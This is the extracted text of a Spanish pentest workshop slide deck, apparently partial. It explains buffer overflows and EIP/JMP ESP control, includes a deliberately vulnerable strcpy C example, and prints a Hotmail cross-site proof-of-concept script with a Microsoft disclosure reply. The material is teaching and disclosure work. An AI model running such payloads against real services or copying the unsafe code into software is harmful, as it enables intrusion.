Este documento presenta una agenda y actividades para un taller sobre pruebas de penetración (pentest). La agenda incluye introducciones a pentest, técnicas básicas de hacking y una sesión de preguntas y respuestas. Las actividades cubren riesgos de seguridad corporativa, tipos de pruebas de pentest, estructura de un pentest, técnicas básicas de hacking y conclusiones. El documento también proporciona ejemplos de shellcodes y explica vulnerabilidades como buffer overflows.
Diagrama de flujo basada en la reparacion de automoviles.pdf
Pen test: El arte de la guerra
1. PEN TEST WorkShop El Arte de la Guerra Vicente Chi Pérez Luis Alberto Cortes
2. PEN TEST AGENDA WORKSHOP 20 Min: Que es un Pentest? 40 Min: Be a Lulzsecguyfor a while!!!! 60 Min: Betterthananonymous!!!. 20 Min: Preguntas y respuestas.
3. PEN TEST ACTIVIDADES WORKSHOP RIESGOS DE LA SEGURIDAD CORPORATIVA PRUEBAS DE PENETRACION TIPOS DE PRUEBAS ESTRUCTURA DE UN PENTEST TECNICAS BASICAS DE HACKEO HACKING !!!!! CONCLUSIONES
4.
5. El mismo numero 98% desconoce la forma de pensar y las técnicas usadas por los atacantes.
6. En la actualidad el hacking ha crecido mas como una actividad delictiva y enfocada a ciertos blancos.
91. PEN TEST EXPLOITS BUFFER OVERFLOWS WORKSHOP Definición Insertar datos mas grandes que el máximo alocado en memoria, dando esto en el cambio de flujo del programa ya sea por corrupción del Extended Instruction Pointer (EIP) o funciones corruptas (Heap) Porque Existen los BO La forma en que la creación de sistemas operativos se enseña provee una optimización de lectura y escritura en la memoria, por lo cual es espacio se aloca de izquierda a derecha y se escribe en forma inversa. Cada ves que un programa ejecuta una rutina el sistema operativo hace lo siguiente: Guardar la dirección de la siguiente instrucción valida en EIP (4 Bytes, 0x77777777) Guardar la dirección de las variables dentro de un puntero en EBP (4 Bytes, 0x77777777) Alocar espacio para las variables de la función que se esta llamando (Depende del Buffer) Una ves terminada la función, se llama al código que punta EIP (Valor guardado) Y así sucesivamente……. Por lo que si tomamos control de EIP, podemos decir que al terminar la función el programa ejecute como siguiente código lo que el hacker quiera.
92. PEN TEST EXPLOITS BUFFER OVERFLOWS WORKSHOP #include <stdio.h> #include <string.h> intmain(intargc, char **argv) { char buffer[20]; strcpy(buffer, argv[1]); printf("%s", buffer); } PADDING EIP EBP BUFFER 20 BYTES SEH Handler STACK STACK 0xC0000005 0x45DF33AD 0x65D537AB NOTA: Algunos compiladores crean un padding de algunos bytes para evitar el BO.
97. Consiste en saltar a una dirección estática de memoria que a su ves apunta a la direccion de nuestro payload o shellcodeNTDL.dll Kernel32.dll USER32.dll Call ESP JMP ESP PADDING EIP EBP BUFFER 20 BYTES SEH Handler STACK - ESP STACK - EAX “AAAAAAAAAAAAAAAAAAAAAAAAAA” 0xC0000005 0x41414141 0x41414141 Dirección de la escritura en la memoria. NOTA: Algunos compiladores crean un padding de algunos bytes para evitar el BO.
100. PEN TEST CONCLUSIONES WORKSHOP Be OnetoDefeatOne Si no conoces hackers y no sabes como romper y atacar sistemas, como esperas defenderte de ello? Cualquiera puede ser hacker No es ser un genio, es solo el gusto de aprender. La cultura de la seguridad se esta perdiendo Ya no hay investigación ni desarrollo, se necesita mas gente interesada La mayoría de los avances tecnológicos han sido gracias a los hackers. Los consultores de seguridad están prostituidos, cuantos realmente saben hacer exploits y son buenos técnicamente y cuantos, solo tienen el titulo o la certificación por saber usar herramientas ya hechas. (ósea nada nuevo) Hackers famosos != Hackers buenos SQL Injection = Lulzsec & anonymous
101.
102. Hotmail Cross SiteMessage ExploreProof of Concept Hotmail Cross SiteMessage Explorer byNaPa Security NationLabs – México ----------------------------------------------------------------- <html> <head> </head> <body> <script> str1=document.URL; str2=str1.split("?"); str3=str2[1]; str4=str3.split("&"); str5="http://by17fd.bay17.hotmail.msn.com/cgibin/ getmsg?msg=&start=&len=&mfs=&cmd=next&lastmsgid="; str6=str4[2]; str7=str6.split("="); str8=str7[1]; str9="&msgread=&etype=&wo="; str10=str5+str8+str9+"&"+str4[0]+"&"+str4[1] window.open(str10); </script> hola napa </body> </html> --------------------------------------------------------------------- Thanksforthefastreply Luis, OK no problems I willprovideyouwithanupdatewhentheteamturnsonthe "a" attribute at theend of October. Itssomethingwehavedifficultywithacknowledgingfindersforour online services, as wedon'tissue a securitybulletinforthem. I apologizeforthis, maybe once thisisalloveryou can present at anyconference and discussthisissue and howwewentfrom a badsituationto a greatoutcome and youweretheresearcherthewholewayalongwhoworkedwith Microsoft tosecureits online systems? I don'tknow I am justthinkingaloud... Cheers Scott D.
103. CONTACTO Vicente Chi Pérez vicente@securitynation.com Luis Alberto Cortes napa@securitynation.com MSN: napa_topos@hotmail.com GRA CIAS